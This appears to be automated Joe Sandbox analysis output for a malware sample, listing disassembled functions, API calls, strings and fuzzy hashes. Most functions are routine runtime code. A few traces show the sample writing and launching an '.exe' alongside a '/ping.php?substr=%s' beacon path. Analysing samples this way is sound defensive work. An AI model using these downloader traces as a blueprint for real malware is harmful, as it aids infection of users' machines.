Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 75ed6e1c9f85c34b315a64263d297d3b47a73d9cda343acb434d8109098bbaba
Instruction ID: e154b9f444e369befffee57ff699e9c141b04c4d0561678f3d19f5bf610271a8
Opcode Fuzzy Hash: 75ed6e1c9f85c34b315a64263d297d3b47a73d9cda343acb434d8109098bbaba
Instruction Fuzzy Hash: AEF0226280031CB7DB10BAA18C02FEA7B988F0A754F21C03BFD40361E0E77D5A0482ED

Uniqueness

Uniqueness Score: -1.00%

Function 00413A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002), ref: 00413A8C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2

Strings

CorExitProcess, xrefs: 00413A97
mscoree.dll, xrefs: 00413A85

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction ID: 222490b34c4e53a5feae2b87ffa662e2080e553be967456abbd25fb90b6b76cf
Opcode Fuzzy Hash: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction Fuzzy Hash: 1EF08130A10218FBDB109F91DC09BAEBFB8EF54752F400069F809A2290DB344E45CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 0316ABB7 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction ID: 1f5165a23e484d5293771845d9d4cefce521ac2b0d6e6fbd51f60ee67991cd0c
Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction Fuzzy Hash: D971AFB1E002169FCB25CFD8CC84ABEBB79FF49361F184269E91177141DB7099A1CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A950 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction ID: b33920a143986800139fcf22d81ba1a33bebe7e0c53b62ede7835c02ac38fde1
Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction Fuzzy Hash: 9E712A71D062969BCB308F94C844AFFBB76EF41360F14022BE91457280D774ACE1C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 031652CA Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0316533C
_free.LIBCMT ref: 0316535C

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction ID: 9cdba3c183a8c5a1ee5ff899a3dd193f4097d9371180865c746c305fa0465b3e
Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction Fuzzy Hash: 7E41C136A003009FCB14DFB8C880A5DB7B6EF8E714B1945A9E555EF290DB71E911CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00415063 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004150D5
_free.LIBCMT ref: 004150F5

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction ID: 119d67276799711db09ecd5bf14b9939420992e10a89990823b09dedeceb6b84
Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction Fuzzy Hash: F941E232E00700EBCB15DF79C880A9EB7B1EF89318B1545AAE515EB392D634AD41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0041B300 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0041197C,?,00000000,?,00000001,?,?,00000001,0041197C,?), ref: 0041B34D
__alloca_probe_16.LIBCMT ref: 0041B385
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B3D6
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DD1,?), ref: 0041B3E8
__freea.LIBCMT ref: 0041B3F1

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction ID: fe6b59a793102c77a27ef18a3bbb39662c21b96f940faf78fbed62ac6a6f166a
Opcode Fuzzy Hash: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction Fuzzy Hash: 3831BF72A0021A9BDB249F65CC41EEF7BA5EB40310F04012EFC14D7291EB39DDA1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0316E66A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0316E673
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0316E696

Part of subcall function 03167CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03167CDE

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0316E6BC
_free.LIBCMT ref: 0316E6CF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0316E6DE

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction ID: b77a4da82b54e333e9f505da7ef465c47763829ec69a064929e73d939640d3a5
Opcode Fuzzy Hash: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction Fuzzy Hash: CF01D47A6013157B233196F65D8CC7BBA6CDACAEA0B190239FD04D6140DF618C22C1B9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E403 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041E40C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E42F

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E455
_free.LIBCMT ref: 0041E468
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E477

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction ID: e222fc366bdc9891f1000934aff4c77bc857fdd668f389f9b834644977e06484
Opcode Fuzzy Hash: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction Fuzzy Hash: 9001847AA012157B27211AB75C8CDFB6A6DDEC6FA4315012AFD08D3201DE688C82C5B9

Uniqueness

Uniqueness Score: -1.00%

Function 03167004 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,031625ED,03167307,?,03166FAE,00000001,00000364,?,0315E697,?,?,?,0315ED94,?), ref: 03167009
_free.LIBCMT ref: 0316703E
_free.LIBCMT ref: 03167065
SetLastError.KERNEL32(00000000), ref: 03167072
SetLastError.KERNEL32(00000000), ref: 0316707B

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: a2ff0fc0dee4949f7368ef600e09552faf33b3920eee764b915ba0175271a6d3
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: 7601D17A240B0167D632E6F96C84A6B221EABCE2B87250164F426A62D0EF25C8624175

Uniqueness

Uniqueness Score: -1.00%

Function 00416D9D Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
_free.LIBCMT ref: 00416DD7
_free.LIBCMT ref: 00416DFE
SetLastError.KERNEL32(00000000), ref: 00416E0B
SetLastError.KERNEL32(00000000), ref: 00416E14

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: 6e49a9887b0250ccd633565296769d6b3062fe87a49412782ccaa8615f8c8364
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: C201F9363847106792217676BC85EEB262D9BC5374763027FF819922D2EF3DCC92505D

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED6E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041ED86

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041ED98
_free.LIBCMT ref: 0041EDAA
_free.LIBCMT ref: 0041EDBC
_free.LIBCMT ref: 0041EDCE

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction ID: d5ef32133b98e4fb2412931fa35fae6bc57e2fe493cbd1108eefdbae164f4dde
Opcode Fuzzy Hash: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction Fuzzy Hash: 6DF04F32544310ABCA20EB6AF885DDB73E9BA44714755181AF848D7640C638FCC0865D

Uniqueness

Uniqueness Score: -1.00%

Function 03165519 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03165537

Part of subcall function 03166501: HeapFree.KERNEL32(00000000,00000000,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?), ref: 03166517
Part of subcall function 03166501: GetLastError.KERNEL32(?,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?,?), ref: 03166529

_free.LIBCMT ref: 03165549
_free.LIBCMT ref: 0316555C
_free.LIBCMT ref: 0316556D
_free.LIBCMT ref: 0316557E

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: bf554a4187419c90b3263350529224edecc2c7c5a78241ead2f60f23a6aff97d
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: 30F054B48112109BCA27EF94FC516053B61FB08714316756EF10456278CF3647A1CFCB

Uniqueness

Uniqueness Score: -1.00%

Function 004152B2 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004152D0

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 004152E2
_free.LIBCMT ref: 004152F5
_free.LIBCMT ref: 00415306
_free.LIBCMT ref: 00415317

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: 804699b6a5c80bac2842bae3f4e6e7460cbec33686f784624dec7bd42b1af61a
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: 41F030714413209B8A16BF15FC416893B60FB4871831275AFF50866275CB3959918FCE

Uniqueness

Uniqueness Score: -1.00%

Function 0041608E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

@, xrefs: 0041618D

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2895899722
Opcode ID: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
Instruction ID: ae3557305dc9c54a6d59b1edd30c6b9f9c56a404ae947bd98c264bdf0008d32a
Opcode Fuzzy Hash: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
Instruction Fuzzy Hash: EF51D171D00209ABDB10AFA9C845FEF7BB8AF45314F12015BE804B7292D778D982CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0316352A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\g77dRQ1Csm.exe,00000104), ref: 0316356A
_free.LIBCMT ref: 03163635
_free.LIBCMT ref: 0316363F

Strings

C:\Users\user\Desktop\g77dRQ1Csm.exe, xrefs: 03163561, 03163568, 03163597, 031635CF

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\g77dRQ1Csm.exe
API String ID: 2506810119-3535622130
Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction ID: a91ee71d9bdd6af86a67c2bbb4af03e7082ce8a9b13b7743a205f7e626b6e68d
Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction Fuzzy Hash: 7F319379A00258AFDB26DFD99C8099EBBFCEB8C710F14446AE5149B220D7708A51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 004132C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\g77dRQ1Csm.exe,00000104), ref: 00413303
_free.LIBCMT ref: 004133CE
_free.LIBCMT ref: 004133D8

Strings

C:\Users\user\Desktop\g77dRQ1Csm.exe, xrefs: 004132FA, 00413301, 00413330, 00413368

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\g77dRQ1Csm.exe
API String ID: 2506810119-3535622130
Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction ID: e0cf6dde0ac7f492d26fb7a27bfd3cf8f71fda75d9391d43b3cd8632259efb82
Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction Fuzzy Hash: 72319371A0021CABDB219F9698819DEBBB8EB85315F1041ABED14D7210DB799A81CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 03176777 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(?), ref: 031767B9
WaitForSingleObject.KERNEL32(?,00008000), ref: 031767CD
CloseHandle.KERNEL32(?), ref: 031767D6

Strings

.exe, xrefs: 03176782

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: 5c6bd5c18b25c4e9c7339040dcdf42e7ba84b514a6a32d2551fb326b22076c7e
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: 80017831E0061CEBDF15DFA9E8459DDBBB8FF08640F048126F811A6260EB709A45CF84

Uniqueness

Uniqueness Score: -1.00%

Function 031764A9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,03175B74,00000001,?,/ping.php?substr=%s), ref: 031764C4
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,03175B74,00000001,?,/ping.php?substr=%s,?), ref: 031764DC
CloseHandle.KERNEL32(00000000,?,03175B74,00000001,?,/ping.php?substr=%s,?), ref: 031764E5

Strings

.exe, xrefs: 031764AE

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: .exe
API String ID: 1065093856-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: 5e73e12e18219dd744e99dcc3dc0431da708202de587ae7b0331afe7dee1aadd
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: 51E06572601124BBD7311B999C48FA7BE7CEF895A0F040125FB05D21109661DC0197B4

Uniqueness

Uniqueness Score: -1.00%

Function 03167FD6 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 03168061
__alldvrm.LIBCMT ref: 03168262
__alldvrm.LIBCMT ref: 03168284

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction ID: 1a420f221788eb9a63b1ebce3aecd31cf68db7238e45580b76d91c00a2e2a947
Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction Fuzzy Hash: 46A16572A00B869FEB25CF98C8907BEFBE5EF1D350F1841ADD9959B280C7388991C750

Uniqueness

Uniqueness Score: -1.00%

Function 00417D6F Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00417DFA
__alldvrm.LIBCMT ref: 00417FFB
__alldvrm.LIBCMT ref: 0041801D

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction ID: fd8853d8f1522a73f401650a4168fe8705857821074eec12fc08c2aeadde5945
Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
Instruction Fuzzy Hash: 9EA11272A083869FDB218E18C881BEBBBF1EF55354F1441AEE5859B281D63C8982C758

Uniqueness

Uniqueness Score: -1.00%

Function 03172AD6 Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03172C05

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction ID: bbeac878f15907364bbb21a4a4bb9b4b923ff445699c417e24aeca58f65a0a9b
Opcode Fuzzy Hash: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
Instruction Fuzzy Hash: 8F411735A003056BDB35EEF88C88AAE36B9EF4D370F1C0E55F418DB190DB75859382A2

Uniqueness

Uniqueness Score: -1.00%

Function 0042286F Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0042299E

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
Instruction ID: 928e3cb369f2e27a6f9c5d6c25e794823a6f45c2d4bbec1796fd6aa098e8f7c9
Opcode Fuzzy Hash: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
Instruction Fuzzy Hash: B2411B71B002247BDB206B7A9D41BAE36A4EF05334F54021BF818D6291D6FC8DC19669

Uniqueness

Uniqueness Score: -1.00%

Function 0316B567 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042E790,00000000,00000000,8B56FF8B,03164002,?,00000004,00000001,0042E790,0000007F,?,8B56FF8B,00000001), ref: 0316B5B4
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0316B63D
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0316B64F
__freea.LIBCMT ref: 0316B658

Part of subcall function 03167CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03167CDE

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction ID: c0e1468dd0d7e55b6eb206505619a1c0565fa4d825d2e733e564dc91b712107c
Opcode Fuzzy Hash: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
Instruction Fuzzy Hash: A531C172A1020AABDF25DFA5CC44DAE7BA5EF48310F088169FC18DB150EB35CD60CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0315CF11 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0315CF2B

Part of subcall function 0315CE78: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0315CEA7
Part of subcall function 0315CE78: ___AdjustPointer.LIBCMT ref: 0315CEC2

_UnwindNestedFrames.LIBCMT ref: 0315CF40
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0315CF51
CallCatchBlock.LIBVCRUNTIME ref: 0315CF79

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
